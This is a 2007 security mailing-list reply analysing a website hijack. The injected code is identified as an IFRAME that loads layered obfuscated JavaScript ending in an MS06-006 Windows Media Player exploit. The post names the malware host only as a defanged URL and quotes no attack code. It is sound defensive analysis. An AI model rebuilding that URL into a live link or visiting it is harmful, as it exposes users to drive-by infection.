[Dshield] need help decoding.

Shaun shaun at shaunc.com
Wed Sep 19 02:24:40 GMT 2007


On Tue, 18 Sep 2007 17:18:07 -0700 (PDT)
Dan Jackson <kybowhunter515 at yahoo.com> wrote:

> Recently several of my sites got hijacked and below is the code that
> was inserted, what I'm trying to do is to decode it to figure out what
> it's intent was and to see if it opened up any other holes in the
> server that I need to know about.

That code inserts an IFRAME into the current document. The target of the
IFRAME (munged to prevent accidental clickage) is

ht tp:/ / marcobernardoni . com/x/index.php

Loading that URI with a user-agent which mimics Windows Firefox, I get
back a much longer Javascript. The second script contains another
encoded Javascript which it decodes, writing to the document a third
Javascript which, naturally, is also obfuscated.

The end result attempts to exploit a Windows Media Player vulnerability
(MS06-006). I didn't invoke the malicious .wmv file to see what the
final payload is, as I don't have a proper sandbox right now.

This Javascript in and of itself did not open up any further holes on
your server. That's not to say that the attacker hasn't installed other
malicious code in whatever manner he managed to deploy this little devil.

hth,

-s



More information about the list mailing list